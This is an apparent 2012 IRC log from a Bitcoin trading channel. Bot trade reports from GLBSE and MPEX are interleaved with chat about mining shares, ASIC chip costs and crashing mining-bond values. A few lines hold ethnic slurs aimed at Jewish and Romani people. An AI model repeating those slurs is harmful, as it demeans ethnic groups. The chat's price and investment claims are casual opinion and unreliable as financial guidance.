Aug 18 14:48:35 [GLBSE] [BTC-MINING] 5 @ 0.99991 = 4.9996 BTC [+] Aug 18 14:49:17 [GLBSE] [GMVT-BOT] 80 @ 0.1 = 8 BTC [+] Aug 18 14:52:21 [GLBSE] [NYAN.C] 10 @ 1 = 10 BTC [+] Aug 18 14:52:23 [GLBSE] [NYAN.C] 18 @ 1 = 18 BTC [+] Aug 18 14:55:00 [MPEX] [F.GIGA.ETF] 5923 @ 0.00104196 = 6.1715 BTC [+] Aug 18 15:00:51 [GLBSE] [NYAN.C] 27 @ 0.9989 = 26.9703 BTC [-] Aug 18 15:01:01 [MPEX] [O.BTCUSD.C140N] 2 @ 0.22366233 = 0.4473 BTC [+] Aug 18 15:02:38 [MPEX] [S.MPOE] 21400 @ 0.00036815 = 7.8784 BTC [-] Aug 18 15:11:59 [MPEX] [F.GIGA.ETF] 5631 @ 0.00102863 = 5.7922 BTC [-] Aug 18 15:18:42 [MPEX] [S.MPOE] 4672 @ 0.00036815 = 1.72 BTC [-] Aug 18 15:18:44 [MPEX] [S.MPOE] 16324 @ 0.00036743 = 5.9979 BTC [-] Aug 18 15:25:17 [MPEX] [F.GIGA.ETF] 3941 @ 0.00101379 = 3.9953 BTC [-] Aug 18 15:25:17 [MPEX] [F.GIGA.ETF] 3265 @ 0.00102563 = 3.3487 BTC [+] Aug 18 15:31:47 [GLBSE] [FOO.PPPPT] 2 @ 0.7001 = 1.4002 BTC [-] Aug 18 15:32:12 [GLBSE] [FOO.PPPPT] 1 @ 0.7 BTC [-] Aug 18 15:33:16 [GLBSE] [FOO.PPPPT] 9 @ 0.7 = 6.3 BTC [-] Aug 18 15:35:14 Hey guys Aug 18 15:35:15 So Aug 18 15:35:19 what is NYAN.C? Aug 18 15:35:29 A basket of assets on the GLBSE Aug 18 15:35:37 with certain criteria. Aug 18 15:35:39 ok Aug 18 15:35:45 Just check the URL in each NYAN Aug 18 15:36:06 So what do you guys think about that Mt. Gox volatilty bot security? Aug 18 15:37:22 i think it's annoying Aug 18 15:38:06 https://glbse.com/asset/view/GMVT-BOT Aug 18 15:38:10 That's annoying? Aug 18 15:38:12 mainly cuz i dont want competition or cross-interaction with my bot Aug 18 15:38:17 Ah Aug 18 15:38:46 Bots certainly don't get along Aug 18 15:39:28 Anyone want to buy any POLY.10.1? Aug 18 15:39:50 [GLBSE] [NYAN.C] 2 @ 0.9989 = 1.9978 BTC [-] Aug 18 15:40:08 [GLBSE] [BITBOND] 2 @ 0.399 = 0.798 BTC [+] Aug 18 15:48:38 [GLBSE] [NASTY] 5 @ 0.58 = 2.9 BTC [-] Aug 18 15:48:39 [GLBSE] [NASTY] 6 @ 0.58498 = 3.5099 BTC [+] Aug 18 15:48:40 [GLBSE] [NASTY] 1 @ 0.58499 BTC [+] Aug 18 15:48:41 [GLBSE] [NASTY] 3 @ 0.585 = 1.755 BTC [+] Aug 18 15:48:43 [GLBSE] [NASTY] 14 @ 0.6 = 8.4 BTC [+] Aug 18 15:48:44 [GLBSE] [NASTY] 2 @ 0.64 = 1.28 BTC [+] Aug 18 15:48:45 [GLBSE] [NASTY] 7 @ 0.649 = 4.543 BTC [+] Aug 18 15:48:46 [GLBSE] [NASTY] 42 @ 0.65 = 27.3 BTC [+] Aug 18 15:49:11 [GLBSE] [GIGAMINING] 6 @ 0.9999 = 5.9994 BTC [-] Aug 18 15:49:13 [GLBSE] [GIGAMINING] 34 @ 1 = 34 BTC [+] Aug 18 15:49:29 [GLBSE] [NASTY] 15 @ 0.65 = 9.75 BTC [+] Aug 18 15:49:53 [GLBSE] [NASTY] 3 @ 0.65 = 1.95 BTC [+] Aug 18 15:52:50 [GLBSE] [MOORE] 3 @ 0.5131 = 1.5393 BTC [-] Aug 18 15:53:12 [GLBSE] [OBSI.HRPT] 2 @ 0.1005 = 0.201 BTC [+] Aug 18 15:53:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 18 15:53:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 18 15:54:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1005 BTC [+] Aug 18 15:56:16 [GLBSE] [MOORE] 3 @ 0.513 = 1.539 BTC [-] Aug 18 15:56:45 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7 = 1.4 BTC [-] Aug 18 15:58:37 [GLBSE] [BDK.BND] 7 @ 0.1011 = 0.7077 BTC [-] Aug 18 15:58:45 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7 = 1.4 BTC [-] Aug 18 15:59:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 18 15:59:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 18 16:02:35 [GLBSE] [OBSI.HRPT] 3 @ 0.1005 = 0.3015 BTC [+] Aug 18 16:05:17 [MPEX] [S.MPOE] 1500000 @ 0.00037 = 555 BTC [+] Aug 18 16:12:23 [MPEX] [F.GIGA.ETF] 43 @ 0.00104196 = 0.0448 BTC [+] Aug 18 16:12:24 [MPEX] [F.GIGA.ETF] 8000 @ 0.00105166 = 8.4133 BTC [+] Aug 18 16:12:25 [MPEX] [F.GIGA.ETF] 5790 @ 0.00105958 = 6.135 BTC [+] Aug 18 16:12:26 [MPEX] [F.GIGA.ETF] 4567 @ 0.0010618 = 4.8492 BTC [+] Aug 18 16:20:33 [GLBSE] [BDK.BND] 1 @ 0.1011 BTC [-] Aug 18 16:20:37 [GLBSE] [TYGRR.BOND-P] 1 @ 0.65 BTC [-] Aug 18 16:20:39 ;;ticker Aug 18 16:20:40 Best bid: 11.6421, Best ask: 11.64211, Bid-ask spread: 0.00001, Last trade: 11.6421, 24 hour volume: 214613, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 16:20:47 o under 12 again huh. Aug 18 16:21:07 [GLBSE] [TYGRR.BOND-P] 4 @ 0.533 = 2.132 BTC [-] Aug 18 16:22:09 [GLBSE] [MOORE] 3 @ 0.5139 = 1.5417 BTC [+] Aug 18 16:22:10 [GLBSE] [MOORE] 2 @ 0.514 = 1.028 BTC [+] Aug 18 16:23:33 o, https://bitcointalk.org/index.php?topic=100303.0 Aug 18 16:24:38 [GLBSE] [MOORE] 1 @ 0.513 BTC [-] Aug 18 16:24:48 hm Aug 18 16:24:55 nevermind Aug 18 16:24:58 this is old Aug 18 16:25:17 but MPOE-pr still kickin Aug 18 16:25:19 [GLBSE] [MOORE] 3 @ 0.5013 = 1.5039 BTC [-] Aug 18 16:25:20 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Aug 18 16:25:46 lol Aug 18 16:25:47 [MPEX] [F.GIGA.ETF] 8833 @ 0.0010618 = 9.3789 BTC [+] Aug 18 16:25:47 [MPEX] [F.GIGA.ETF] 3222 @ 0.00106279 = 3.4243 BTC [+] Aug 18 16:26:09 [GLBSE] [TYGRR.BOND-P] 3 @ 0.7 = 2.1 BTC [+] Aug 18 16:27:18 [GLBSE] [GIGAMINING] 1 @ 0.9901 BTC [-] Aug 18 16:27:49 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7 = 1.4 BTC [+] Aug 18 16:29:53 [GLBSE] [FPGA.CONTRACT] 1 @ 0.1539 BTC [+] Aug 18 16:30:23 damn, is there anything worth investing in left in GLBSE? Aug 18 16:30:46 is it all bitcoin related companies, or are there regular companies on there as well? Aug 18 16:31:29 EskimoBob haha move to mpex Aug 18 16:31:51 give your money to the greek jewish pornspiracy. Aug 18 16:32:04 projectshifter: i did not see anything non-bitcoin-related there Aug 18 16:32:17 EskimoBob: POLY.10.1 Aug 18 16:32:41 yeah, a gipsy banker... what else? Aug 18 16:32:52 correction .. wanker Aug 18 16:33:06 "This turd was issued at 0.25 BTC." Aug 18 16:33:08 lol Aug 18 16:33:11 lol, i was wondering if a regular business could successfully take investment capital from btc Aug 18 16:33:24 projectshifter maybe. it'd depend how you write your contracts. Aug 18 16:33:24 Oh Aug 18 16:33:26 projectshifter: probably Aug 18 16:33:41 There is that Mt. Gox Volatility bot stock. Aug 18 16:33:46 The guy seems legit. Aug 18 16:34:08 EmanuelDeOrtego: no thank you Aug 18 16:34:39 bots are annoying little shits that need no support Aug 18 16:34:55 You sound like an angry old person from the floor trading days. Aug 18 16:35:07 what would you like to support EskimoBob ? Aug 18 16:35:26 something innovative Aug 18 16:35:34 EmanuelDeOrtego i'm from the floor trading days. he's from the deep south, i reckon. Aug 18 16:36:04 mircea_popescu: I bet you have never even seen a trading floor Aug 18 16:36:20 interesting. i feel like i'm missing a piece of how a regular company could take in btc investment capital and what makes it appealing over traditional forms Aug 18 16:36:25 how'd we settle this bet ? Aug 18 16:36:31 projectshifter pm. Aug 18 16:36:56 projectshifter: sure there is a way and is not that complicated. Aug 18 16:38:35 i didn't realize investments were really going on with btc until the other day Aug 18 16:38:41 EskimoBob: So are mining turds good for anything? Aug 18 16:39:29 we're in the process of working on some deals with a couple investors who are wanting to get in, we were debating at looking at some different options, was curious if there were businesses successfully doing it with btc and what the appeal actually was Aug 18 16:39:32 [MPEX] [S.MPOE] 43096 @ 0.00037 = 15.9455 BTC [+] Aug 18 16:40:25 well, mpex is valued at ~400k btc atm on the market. Aug 18 16:40:26 projectshifter: they have BTC but you need USD? Aug 18 16:40:39 that'd be a few millions, and as far as i know the highest market cap in bitcoin. Aug 18 16:41:11 [GLBSE] [MOVETO.FUND] 3 @ 1.1599 = 3.4797 BTC [+] Aug 18 16:41:13 [GLBSE] [MOVETO.FUND] 50 @ 1.16 = 58 BTC [+] Aug 18 16:41:17 mpex is not valued at ... it has stocks and what ever trading at value of .... Aug 18 16:41:28 EskimoBob do you comprehend market valuation ? Aug 18 16:41:39 here we go... Aug 18 16:41:44 yes, here we go. Aug 18 16:41:47 do you or don't you ? Aug 18 16:41:52 EskimoBob, yeah, something where all the purchases/sales would be in USD Aug 18 16:41:59 [GLBSE] [MOVETO.FUND] 10 @ 1.17258084 = 11.7258 BTC [+] Aug 18 16:42:09 which makes me wonder more if it's novelty than practicality Aug 18 16:42:11 We're only 8 Bitcoins away from $13 again Aug 18 16:42:22 ;;ticker Aug 18 16:42:22 Best bid: 11.55032, Best ask: 11.55033, Bid-ask spread: 0.00001, Last trade: 11.55032, 24 hour volume: 214385, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 16:42:35 ;;bids 13 Aug 18 16:42:37 There are currently 0 bitcoins demanded at or over 13.0 USD, worth 0.0 USD in total. Aug 18 16:42:43 wtf ?! Aug 18 16:42:54 ;;asks 13 Aug 18 16:42:55 ;;market buy 9000 Aug 18 16:42:56 There are currently 10954.53 bitcoins offered at or under 13.0 USD, worth 137668.000476 USD in total. Aug 18 16:42:57 A market order to buy 9000 bitcoins right now would take 112268.0078 USD and would take the last price up to 12.9890 USD, resulting in an average price of 12.4742 USD/BTC. Aug 18 16:43:08 Yep more like 9000 Aug 18 16:43:15 over nine thousand. Aug 18 16:43:16 [GLBSE] [FUTUREFUND] 930 @ 0.00010611 = 0.0987 BTC [-] Aug 18 16:43:25 This dip is temporary Aug 18 16:43:34 Pirate is going to buy this thing into next week Aug 18 16:43:37 everything is temporary hehe Aug 18 16:43:37 [GLBSE] [MOVETO.FUND] 15 @ 1.17268084 = 17.5902 BTC [+] Aug 18 16:43:57 Well, relative to August Aug 18 16:44:15 Nevermind Aug 18 16:44:18 Somebody is dumping Aug 18 16:44:29 [GLBSE] [MOVETO.FUND] 5 @ 1.17268084 = 5.8634 BTC [+] Aug 18 16:44:37 Down to 10 perhaps Aug 18 16:44:39 [GLBSE] [FUTUREFUND] 2000 @ 0.00010001 = 0.2 BTC [-] Aug 18 16:44:46 [GLBSE] [TYGRR.BOND-P] 4 @ 0.6999 = 2.7996 BTC [-] Aug 18 16:45:09 Nope it was only 2000 BTC Aug 18 16:45:14 [GLBSE] [MOVETO.FUND] 1 @ 1.17268084 BTC [+] Aug 18 16:45:35 [GLBSE] [TYGRR.BOND-P] 37 @ 0.7 = 25.9 BTC [+] Aug 18 16:45:49 There's over 30,000 Bitcoins worth of bids Aug 18 16:45:57 So we're stuck over 10 for a good long time Aug 18 16:46:09 [GLBSE] [MOVETO.FUND] 1 @ 1.17268084 BTC [+] Aug 18 16:46:09 30k at $10 and above that is Aug 18 16:46:51 LOL 2012-08-17 21:33:36] < random BS&T investor > i'm starting to think quitting my day job in favor of btcst wasn't the best decision Aug 18 16:47:26 ahahaha Aug 18 16:47:38 that has got to be a troll. Aug 18 16:48:09 [GLBSE] [FUTUREFUND] 988 @ 0.0001 = 0.0988 BTC [-] Aug 18 16:48:14 [MPEX] [S.MPOE] 54300 @ 0.00037 = 20.091 BTC [+] Aug 18 16:51:02 Joric in OTC? Aug 18 16:51:45 [MPEX] [S.MPOE] 7661 @ 0.00037 = 2.8346 BTC [+] Aug 18 16:54:00 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 18 16:55:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.73999999 BTC [+] Aug 18 16:55:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.74 BTC [+] Aug 18 16:55:44 [GLBSE] [ASICMINER] 90 @ 0.105 = 9.45 BTC [+] Aug 18 16:56:01 [GLBSE] [ABM] 6 @ 0.36 = 2.16 BTC [+] Aug 18 16:56:12 any educated comments on ASICMINER? Aug 18 16:57:22 [GLBSE] [FUTUREFUND] 700 @ 0.00008011 = 0.0561 BTC [-] Aug 18 16:57:37 when pirate will finish it will possible to start lending money for lower, than 7% per week. Aug 18 16:57:54 if those guy pull it off, it will be cool but I have no idea how complicated it actually is do design a ASIC chip for btc mining. Can just 3 guys do it like that? Aug 18 16:57:59 (sorry, wrong channel) Aug 18 16:58:25 EskimoBob not likely. Aug 18 16:59:00 [GLBSE] [OBSI.HRPT] 1 @ 0.10000001 BTC [-] Aug 18 17:00:03 he has some type of prototype and I guess this gets somehow transformed to a real chip "something" and then they can print like mad. Aug 18 17:00:33 it's really not as simple as that. Aug 18 17:00:38 I guess it is nothing like real CPU Aug 18 17:01:16 I'm working on an ASIC project too, it's not easy but not complicated either... Aug 18 17:01:33 I did look at the thread but I can show you funky images too and tell: this is a ASIC or what ever :) Aug 18 17:01:51 making an asic involves significant capital costs. Aug 18 17:02:03 agath: are you in the same team? Aug 18 17:02:05 people tend to think they can wing it. Aug 18 17:02:16 no, another team Aug 18 17:02:39 investments run from $150 to $1500000 depending on which technology will you use: 130nm down to 45nm Aug 18 17:02:54 agath: and GLBSE trading symbol is? Aug 18 17:02:59 self-funding :-) Aug 18 17:03:06 agath: smaller is better? Aug 18 17:03:15 yes smaller is better Aug 18 17:03:31 agath: what you think about BFL claims? Aug 18 17:03:36 no comment :-) Aug 18 17:03:51 [GLBSE] [TYGRR.BOND-P] 23 @ 0.74 = 17.02 BTC [+] Aug 18 17:03:52 ping.... Aug 18 17:03:52 [GLBSE] [TYGRR.BOND-P] 23 @ 0.79 = 18.17 BTC [+] Aug 18 17:03:53 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8 = 3.2 BTC [+] Aug 18 17:04:11 are you in BFL? Aug 18 17:04:40 $150 ? I don't think so. Aug 18 17:04:47 why not? Aug 18 17:05:03 it costs more to buy a used car. Aug 18 17:05:11 [GLBSE] [OBSI.HRPT] 1 @ 0.1005 BTC [+] Aug 18 17:05:12 people don't realise what costs actually are etc. Aug 18 17:05:23 I am not related to BFL ..... Aug 18 17:05:38 and $150 for 130nm process is true ...... Aug 18 17:05:47 I started to look for a CCD chip Aug 18 17:06:15 I thought those are absurdly expensive. Ques what, not at all Aug 18 17:06:24 so agath, i pay you 150 bucks you're going to supply me with an infinite ammount of mysql on a chip, 130nm process Aug 18 17:06:26 is this correct ? Aug 18 17:07:06 what did you just ask? Aug 18 17:07:37 i showed him what stupidity the 150 bucks claim is. Aug 18 17:08:11 no, you asked for a CPU wit OS to run db .. or something like that Aug 18 17:08:24 agath: what u think about 5W giving 3,5ghash? Aug 18 17:08:26 and you added "infinite" Aug 18 17:08:27 he said that 130nm chips cost 150 bucks. just like that. Aug 18 17:08:41 130nm will heat uch Aug 18 17:08:42 much* Aug 18 17:08:49 [GLBSE] [OBSI.HRPT] 1 @ 0.1005 BTC [+] Aug 18 17:09:02 no Anduck these are magical chips of imagination. they work differently from what you'd expect. Aug 18 17:09:25 in infinity, everything is possible. Even ponies with rainbows out of their arses Aug 18 17:09:45 for the rest of us, asic runs have significant capital costs associated. Aug 18 17:09:55 bahh Aug 18 17:09:56 [GLBSE] [OBSI.HRPT] 7 @ 0.1 = 0.7 BTC [-] Aug 18 17:11:32 mircea_popescu: are u sure? Aug 18 17:11:42 im pretty sure, yea. Aug 18 17:11:50 u are wrong. Aug 18 17:11:59 sigh. Aug 18 17:12:07 :P Aug 18 17:12:34 designing those chips is the hard part - BUT if u can do it, it'll all go good Aug 18 17:12:38 this reminds me of the kids that are going to start a radio station / a newspaper / etc. Aug 18 17:12:45 :D Aug 18 17:12:52 asic making is really hard tho Aug 18 17:12:55 [GLBSE] [TYGRR.BOND-P] 1 @ 0.77 BTC [-] Aug 18 17:12:57 sorry I was meaning $150000 Aug 18 17:13:01 $150K Aug 18 17:13:06 yea Aug 18 17:13:12 "o, the talk host is the hard part but if you're talented like i think i am it doesn't matter that it's a de facto monopoly and nobody will run your shitty show" Aug 18 17:13:13 etc. Aug 18 17:13:18 and $1500K for 45nm Aug 18 17:13:20 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [-] Aug 18 17:13:38 agath how many chips in your run with those numbers ? Aug 18 17:13:45 CAUSE ITS A FUCKING IMPORTANT POINT Aug 18 17:13:55 [MPEX] [S.MPOE] 19258 @ 0.00037 = 7.1255 BTC [+] Aug 18 17:13:56 [MPEX] [S.MPOE] 9700 @ 0.00037368 = 3.6247 BTC [+] Aug 18 17:15:04 [10:08:23] he said that 130nm chips cost 150 bucks. just like that. Aug 18 17:15:06 who did? Aug 18 17:15:17 he meant 150k Aug 18 17:15:25 he meant 150k Aug 18 17:15:30 copycat Aug 18 17:15:33 lol soz Aug 18 17:15:37 np Aug 18 17:15:43 mircea_popescu: I don't intend to sell this, and I also don't search for investors so I don't need to tell you details about it... I just wanted to tell you that it's not so much complicated as it might seem, if you know how to do it. Aug 18 17:15:57 myea... Aug 18 17:16:03 that is the part many dont get Aug 18 17:16:21 did you do an asic run before agath ? Aug 18 17:16:25 but who said it was 150k? Aug 18 17:16:31 agath did Aug 18 17:16:42 because if its a small wafer size, thats quite possible Aug 18 17:16:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.52011052 BTC [-] Aug 18 17:16:48 [GLBSE] [TYGRR.BOND-P] 4 @ 0.52010106 = 2.0804 BTC [-] Aug 18 17:16:48 my partner yes, it's part of his job Aug 18 17:16:49 [GLBSE] [TYGRR.BOND-P] 18 @ 0.52010001 = 9.3618 BTC [-] Aug 18 17:16:49 lol Diablo-D3 has 150k around so he's interested :D Aug 18 17:16:59 agath so your partner. mkay. Aug 18 17:17:12 I already told you I'm not looking for funds Aug 18 17:17:24 I dont have $150k laying around Aug 18 17:17:24 Diablo-D3: did you get the trading logs? Aug 18 17:17:31 Im just saying its not out of the ordinary Aug 18 17:18:17 BTW diablo already knows a bit about me... Aug 18 17:18:22 EskimoBob: even if I do, Im not handing them over Aug 18 17:18:37 BTW2: prietena mea este romanca Aug 18 17:18:39 look, frankly : there's many problems potentially with a chip design. you have to check for resonances, for all sorts of problems. "a design" anyone can make. one that's valid and has a good rate is expensive. that aside, you have minimum chip runs, and the cost per chip is nothing like the cost per cd or such. Aug 18 17:18:44 so, we're talking money here. Aug 18 17:18:55 agath: that may be possible, but Im going to bed thus Im not getting into character assassination fortress 2 Aug 18 17:18:58 agath sa-ti traiasca. Aug 18 17:19:01 Diablo-D3: so we never know, how you wasted all that investors money and lost 90% of the NAV? Aug 18 17:19:01 train mvp Aug 18 17:19:04 that sucks Aug 18 17:19:13 EskimoBob: well, we know how 90% of the nav was obliterated Aug 18 17:19:13 ms Aug 18 17:19:26 we went from 0.15 per mh normal down to 0.03 Aug 18 17:19:28 overnight Aug 18 17:19:45 no idea how you managed to do that Aug 18 17:20:21 I did? Aug 18 17:20:21 dude Aug 18 17:20:24 asicminer did Aug 18 17:20:38 Diablo-D3 did u buy asicminer? Aug 18 17:20:44 is agath part of ASICMINER? Aug 18 17:20:46 Anduck: an absolute shitload Aug 18 17:20:52 and hes not part of asicminer afaik Aug 18 17:20:53 really? all miningturds lost 90% over night? Aug 18 17:20:58 EskimoBob: yes Aug 18 17:21:06 how? Aug 18 17:21:08 I am not part of asicminer, neither bfl Aug 18 17:21:31 my only (little) known project in the bitcoin world is pyramining Aug 18 17:21:32 EskimoBob: 30mh share that might be worth 150 in the future being sold for 0.1 Aug 18 17:21:54 agath: why did you want to know the cost of 130nm chips? Aug 18 17:21:57 I came in the middle of this Aug 18 17:22:00 wasnt 0.1 the ipo price? Aug 18 17:22:07 Anduck: yes. Aug 18 17:22:09 I didn't want to know, I know it already, I was just commenting Aug 18 17:22:27 Anduck: but resale is still like 0.105 in some cases Aug 18 17:22:36 agath: ahh Aug 18 17:22:41 ;;ticker Aug 18 17:22:42 Best bid: 11.36709, Best ask: 11.3671, Bid-ask spread: 0.00001, Last trade: 11.36709, 24 hour volume: 219648, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 17:22:45 but yeah, 130nm @ 150k is possible Aug 18 17:22:59 possible it is, yes, if you're talking just design costs. Aug 18 17:22:59 it depends entirely on what fab, what wafer size, and other various factors Aug 18 17:23:04 yes I already asked some quotes .. Aug 18 17:23:16 mircea_popescu: no, already designed and taped out for that fab Aug 18 17:23:24 Diablo-D3 how many chips in the run ? Aug 18 17:23:40 mircea_popescu: depends on wafer size, yield quality, and chip size Aug 18 17:23:50 ... Aug 18 17:23:54 ofcourse it does! Aug 18 17:24:31 if your design is prone to produce 90% failures, well, you're not going to have very many chips Aug 18 17:24:39 jesus god this is an insane convo. "i can make cars for X usd." "ok, how many". "thart depends on the type of car". Aug 18 17:24:53 did agath say how many chips? Aug 18 17:25:03 this is what im trying to pry out of anyone throwing numbers around Aug 18 17:25:06 mircea_popescu: btw, you pay per wafer Aug 18 17:25:12 wtf. WHAT DA FUCK are they talking about. Aug 18 17:25:22 you pay per wafer, buyt you have minimums. Aug 18 17:25:28 first run will be a MPW Aug 18 17:25:38 yes, but the minimum is different per fab size and per company Aug 18 17:25:54 agath: is 5W enough to power 3.5 gigahash/s? Aug 18 17:25:55 130nm, you might be able to swing a single wafer print Aug 18 17:26:01 o, so basically your partner is sticking your design into an unused space Aug 18 17:26:05 cause he works there Aug 18 17:26:05 i pretty much say it's quite impossible Aug 18 17:26:09 sure, it can be free then. Aug 18 17:26:32 mircea_popescu: _that_ is called shared silicon Aug 18 17:26:47 thats frequent in extremely tiny runs and educational runs Aug 18 17:26:52 yes. Aug 18 17:26:56 except it's not business. Aug 18 17:27:09 Anduck: yes it might, my design should require 0.5W / GH @ 65nm (simulation only, it might be different), and I can't say too many details Aug 18 17:27:12 fabs still do it on old node sizes Aug 18 17:27:18 well it's not MY design Aug 18 17:27:24 Diablo-D3 hence the 130 w/e Aug 18 17:27:24 it's from my partners... Aug 18 17:27:30 mircea_popescu: yup Aug 18 17:27:34 Diablo-D3: see PM Aug 18 17:27:36 ok ty Aug 18 17:27:41 and anyway I think that it has no meaning to discuss about this here. Aug 18 17:27:52 ya i was saying, here we are doing otc-mining Aug 18 17:28:17 EskimoBob: k Aug 18 17:28:17 [GLBSE] [MMM] 4 @ 0.8 = 3.2 BTC [+] Aug 18 17:28:26 agath: well Aug 18 17:28:34 asicminer didnt up front say what they did Aug 18 17:28:49 I know what they did now, but Im not sure if I can repeat it Aug 18 17:29:03 why not ? Aug 18 17:29:03 it hurts to look at BTC just sitting there and not earning income :( Aug 18 17:29:26 mircea_popescu: they havent released it as public information Aug 18 17:29:47 but its a small wafer size combined with a large node size Aug 18 17:30:10 and the fab company offers single wafer runs for their old shit Aug 18 17:30:17 the question now is, wtf is bfl doing Aug 18 17:30:24 i have my doubts about the entire thing strictly because i don't know the peiople and it's china based. Aug 18 17:30:30 these can either run very well or very bad. Aug 18 17:30:43 its either 65nm end to end asic from altera, or 130nm shared silicon or spammed IP cores Aug 18 17:30:55 mircea_popescu: yes, this is true Aug 18 17:31:02 [MPEX] [O.BTCUSD.C120T] 3 @ 0.1522255 = 0.4567 BTC [-] Aug 18 17:31:19 and my risk appetite is low atm, so. i didn't get into it. Aug 18 17:31:25 but who knows, maybe it works for some ppls. Aug 18 17:31:34 however, its enough that I, deadterra, and usagi believe that they're more likely to succeed than bfl Aug 18 17:32:03 i loathe this "partner" business. Aug 18 17:32:10 if DeaDTerra was doing it himself... yea, i guess, maybe. Aug 18 17:32:20 deadterra doesnt have the knowhow for it Aug 18 17:32:24 with partners... that owens guy was a partner, that bitscalper alfredo dude same Aug 18 17:32:24 etc. Aug 18 17:32:41 the list of busts in btc is mostly partners. shakaru was a "partner". Aug 18 17:33:26 mircea_popescu: well, its why Im insulating myself with bfl upgrades Aug 18 17:33:35 i thought you don't do bfl Aug 18 17:33:39 I dont Aug 18 17:33:42 it doesnt stop others Aug 18 17:33:53 there mircea_popescu, i gave @mostofmany a user pic Aug 18 17:34:04 infact, I basically cant avoid gettting mhash from bfl Aug 18 17:34:26 lmao Aug 18 17:34:27 every major entity on glbse has at least one in their collection Aug 18 17:34:37 dude just use your pic from bitvps photo album Aug 18 17:34:48 [GLBSE] [RSM] 1 @ 0.2 BTC [-] Aug 18 17:35:03 Diablo-D3 you mean the fpga things ? Aug 18 17:35:10 pyramining hashing power is BFL-free :-) Aug 18 17:35:16 mircea_popescu: yeah Aug 18 17:35:25 and everyone is upgrading their shit Aug 18 17:35:30 haha, i was half thinking i'll get one myself. just for the decor. Aug 18 17:35:46 agath: yes, but I cant buy pyramining on glbse Aug 18 17:36:07 I didn't meant to buy it, it was just a statement! Aug 18 17:36:12 Diablo-D3 smickles' stuff is bfl free im sure. Aug 18 17:36:31 is smickles on glbse? Aug 18 17:36:33 is that bitvps one better than the one used @smickles? Aug 18 17:36:43 Diablo-D3: i have 2 listings Aug 18 17:36:50 I think I know this already Aug 18 17:36:52 i think so. Aug 18 17:37:06 my memory does not serve me today Aug 18 17:37:08 in the photo on rg's site you look like a real smickles. Aug 18 17:37:53 EskimoBob: have I not sufficiently explained the market crashing overnight? Aug 18 17:38:36 EskimoBob: the value of mh dropped 5x Aug 18 17:38:42 ;;ticker Aug 18 17:38:43 Best bid: 11.18, Best ask: 11.18001, Bid-ask spread: 0.00001, Last trade: 11.18, 24 hour volume: 220233, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 17:39:01 Diablo-D3 i think as long as there's going to be people who bought at 1 and it's 0.05 or /we now you'll be in this position Aug 18 17:39:38 smickles omg your wife is a rocket scientist ?! Aug 18 17:39:48 Diablo-D3: for some odd reason I actually give a shit about your rep. so I thought open book will clear it up for good :) Aug 18 17:40:04 mircea_popescu: well, the people who are bailing out at the bottom are nuts Aug 18 17:40:31 Diablo-D3: but how do they know this is the bottom? Aug 18 17:40:39 a, a question for the ages. Aug 18 17:40:52 EskimoBob: well, if we're not at the bottom, then someone is about to announce 1gh/share for 0.10. Aug 18 17:40:53 "bottom" can be only indicated after the fact Aug 18 17:41:38 Diablo-D3: hold on, I think I have missed a line or 2 in this conversation. Aug 18 17:41:38 [GLBSE] [BDT] 10 @ 0.9599 = 9.599 BTC [+] Aug 18 17:41:53 where did this super cheap Mh/s popped in Aug 18 17:42:06 when you were afk for a week I think Aug 18 17:42:38 did someone build a working ASIC and is mining and selling Mh/s? Aug 18 17:42:43 asicminer's IPO was 0.1 for 30mh Aug 18 17:43:03 oh that one... but this is still imaginary ASIC Aug 18 17:43:09 [GLBSE] [NASTY] 4 @ 0.7 = 2.8 BTC [+] Aug 18 17:43:11 its not very imaginary. Aug 18 17:43:27 friedcat answered questions that would be very difficult to answer if he wasnt already in the process Aug 18 17:43:42 I take off for a week and shit hits the fan :) damn Aug 18 17:43:49 yeah, you missed the epic fun Aug 18 17:44:04 [GLBSE] [MOVETO.FUND] 25 @ 1.17268084 = 29.317 BTC [+] Aug 18 17:44:11 so we went from 0.15/mh (except obsi.1mhs at 0.10 which didnt have time to drive everything else down).... Aug 18 17:44:14 to 0.03/mh Aug 18 17:44:15 no I did. not. You have no idea how good it is to fish and kill for food Aug 18 17:44:29 EskimoBob: oh and better yet Aug 18 17:44:37 if this first run goes super well Aug 18 17:44:50 that could be 150mh/share early next year Aug 18 17:45:13 can I say "I told you so"? Aug 18 17:45:15 whats the possibility for super well run? Aug 18 17:45:18 mircea_popescu: lolwut? Aug 18 17:45:28 Anduck: I'd flip coins on it Aug 18 17:45:30 Mh/s bonds are dead Aug 18 17:45:31 wife rocketscientist? Aug 18 17:45:34 smickles i read your blogspot. Aug 18 17:45:41 EskimoBob: they're dead now Aug 18 17:45:43 [GLBSE] [TYGRR.BOND-PI] 3 @ 1 = 3 BTC [-] Aug 18 17:45:52 she's in avionics maintenence Aug 18 17:45:53 EskimoBob: and theres a specific reason why I was buying obsi.1mhs Aug 18 17:45:58 [GLBSE] [LTC-MINING] 1 @ 0.589 BTC [-] Aug 18 17:45:59 same thing. Aug 18 17:46:04 EskimoBob: so I could upgrade them into abmo Aug 18 17:46:25 EskimoBob: which I went from 1mh/share to what Im valuing as 7mh/share for free Aug 18 17:46:28 i suppose similar Aug 18 17:46:48 interesting indeed but I am not sure this is the correct path any more. Aug 18 17:46:52 [GLBSE] [PUREMINING] 3 @ 0.138 = 0.414 BTC [-] Aug 18 17:46:57 EskimoBob: so, after obsi.1mhs pays that dividend on the 19th, we go from 3.5mh/dmc to 5mh/dmc 